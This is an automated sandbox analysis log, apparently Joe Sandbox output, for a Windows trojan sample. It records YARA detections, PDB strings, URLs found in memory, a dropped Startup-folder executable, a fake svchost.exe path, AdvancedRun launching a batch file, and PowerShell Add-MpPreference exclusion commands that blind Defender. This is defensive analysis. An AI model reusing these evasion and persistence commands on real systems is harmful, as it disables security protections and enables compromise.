                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Yara detected UAC Bypass using CMSTPShow sources
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4297e30.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4297e30.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4217e10.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.4217e10.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.56f0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.41d7df0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.56f0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.41b7dd0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.424024151.00000000056F0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.413677041.00000000041B7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lKJbVguaav.exe PID: 6396, type: MEMORYSTR
                      Source: lKJbVguaav.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeDirectory created: C:\Program Files\Common Files\System\E59A6148Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeDirectory created: C:\Program Files\Common Files\System\E59A6148\svchost.exeJump to behavior
                      Source: lKJbVguaav.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbF source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: Accessibility.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb8 source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: lKJbVguaav.PDB@ source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: D:\Windows\Cursors\SuperServidorNet\_private_cry\rpe-bitrat\JabrezRPE\JabrezRPE\obj\x86\Debug\RunPE_MemoryProtection.pdb source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.363430987.000000000143F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Diagnostics.FastSerialization.pdbpdbion.pdb7 source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: ipC:\Windows\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002B.00000002.440495695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.445188545.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000000.435782596.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000002.439972142.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000000.439981519.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.454809675.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000033.00000002.448405509.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000034.00000000.450460932.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.37.dr
                      Source: Binary string: System.Xml.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: iC:\Users\user\Desktop\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe
                      Source: Binary string: C:\Users\user\Desktop\lKJbVguaav.PDB source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.426583750.00000000067DD000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.426370254.00000000067C0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdbv.PDB source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: RunPE_MemoryProtection.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.pdbH source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Xml.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.363430987.000000000143F000.00000004.00000020.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb@ source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb) source: lKJbVguaav.exe, 00000000.00000000.426370254.00000000067C0000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdbic.pdbE3931}\InprocServer32 source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.Drawing.pdbr source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Windows.Forms.pdbh source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp, WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.Drawing.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Management.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: c.pdbis_ source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: Microsoft.Diagnostics.FastSerialization.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Xml.pdbD source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: .pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: lKJbVguaav.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: lKJbVguaav.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: lKJbVguaav.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: lKJbVguaav.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: lKJbVguaav.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: lKJbVguaav.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: lKJbVguaav.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: lKJbVguaav.exeString found in binary or memory: http://regexlib.com/
                      Source: lKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lKJbVguaav.exeString found in binary or memory: http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
                      Source: svchost.exe, 0000000A.00000002.309975982.0000020E98A24000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: lKJbVguaav.exeString found in binary or memory: http://www.davidemauri.it/
                      Source: AdvancedRun.exe, AdvancedRun.exe, 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002B.00000002.440495695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.445188545.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000000.435782596.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000002.439972142.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000000.439981519.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.454809675.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000033.00000002.448405509.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000034.00000000.450460932.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.37.drString found in binary or memory: http://www.nirsoft.net/
                      Source: lKJbVguaav.exeString found in binary or memory: http://www.sourceforge.net/projects/regextestkhttp://www.codeproject.com/KB/cs/dotnetregextest.aspx_
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000A.00000003.309250286.0000020E98A49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.310133862.0000020E98A56000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.309250286.0000020E98A49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309164637.0000020E98A64000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: lKJbVguaav.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: https://sectigo.com/CPS0C
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drString found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309975982.0000020E98A24000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309289255.0000020E98A45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.310062042.0000020E98A39000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000002.310133862.0000020E98A56000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: lKJbVguaav.exe, 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownDNS traffic detected: queries for: canonicalizer.ucsuri.tcs
                      Source: lKJbVguaav.exe, 00000000.00000000.363337679.000000000140A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: powershell.exeProcess created: 46

                      System Summary:

                      barindex
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.32.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.32.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lKJbVguaav.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: lKJbVguaav.exe, 00000000.00000000.362788236.0000000000D82000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Diagnostics.FastSerialization.dllp( vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.391473662.000000000324B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametEnxeoGUbsIbZIOzasmmdEfR.exe4 vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.391473662.000000000324B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000000.00000000.363337679.000000000140A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs lKJbVguaav.exe
                      Source: lKJbVguaav.exe, 00000022.00000000.350090444.0000000000752000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Diagnostics.FastSerialization.dllp( vs lKJbVguaav.exe
                      Source: lKJbVguaav.exeBinary or memory string: OriginalFilenameMicrosoft.Diagnostics.FastSerialization.dllp( vs lKJbVguaav.exe
                      Source: lKJbVguaav.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@128/79@5/2
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,7_2_0040A33B
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Program Files\Common Files\System\E59A6148Jump to behavior
                      Source: lKJbVguaav.exe, 00000000.00000000.363430987.000000000143F000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: lKJbVguaav.exeVirustotal: Detection: 61%
                      Source: lKJbVguaav.exeMetadefender: Detection: 34%
                      Source: lKJbVguaav.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile read: C:\Users\user\Desktop\lKJbVguaav.exeJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\lKJbVguaav.exe 'C:\Users\user\Desktop\lKJbVguaav.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /SpecialRun 4101d8 6924
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
